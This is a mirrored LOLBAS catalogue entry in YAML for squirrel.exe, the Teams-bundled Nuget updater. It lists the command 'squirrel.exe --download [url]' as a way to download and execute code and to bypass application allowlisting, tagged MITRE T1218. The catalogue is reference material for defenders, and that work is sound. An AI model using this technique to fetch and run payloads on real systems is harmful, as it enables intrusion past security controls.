mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-28 15:58:24 +01:00
48 lines
1.7 KiB
YAML
48 lines
1.7 KiB
YAML
Name: squirrel.exe
|
|
Description: Binary to update the existing installed Nuget/squirrel package
|
|
Author: User
|
|
Created: Installed date
|
|
Commands:
|
|
- Command: squirrel.exe --download [url to package]
|
|
Description: The above binary will go that particular location and look for RELEASES file and download the nuget package.
|
|
Usecase: Download and execute binary
|
|
Category: Execute
|
|
Privileges: User Privilege
|
|
MitreID: T1218
|
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
|
OperatingSystem: Windows OS
|
|
- Command: squirrel.exe --download [url to package]
|
|
Description: The above binary will go that particular location and look for RELEASES file and download the nuget package.
|
|
Usecase: Download and execute binary
|
|
Category: AWL Bypass
|
|
Privileges: User Privilege
|
|
MitreID: T1218
|
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
|
OperatingSystem: Windows 10
|
|
- Command: squirrel.exe --download [url to package]
|
|
Description: The above binary will go that particular location and look for RELEASES file and download the nuget package.
|
|
Usecase: Download and execute binary
|
|
Category: Download
|
|
Privileges: User Privilege
|
|
MitreID: T1218
|
|
MitreLink: https://attack.mitre.org/techniques/T1218/
|
|
OperatingSystem: Windows 10
|
|
Full_Path:
|
|
- Path: NA
|
|
- Path: %localappdata%\Microsoft\Teams\current\Squirrel.exe
|
|
Code_Sample:
|
|
- Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel
|
|
Detection:
|
|
- IOC: NA
|
|
- IOC: NA
|
|
Resources:
|
|
- Link: https://www.youtube.com/watch?v=rOP3hnkj7ls
|
|
- Link: https://twitter.com/reegun21/status/1144182772623269889
|
|
- Link: NA
|
|
Acknowledgement:
|
|
- Person: Reegun J (OCBC Bank)
|
|
Handle: @reegun21
|
|
- Person: NA
|
|
Handle: NA
|
|
---
|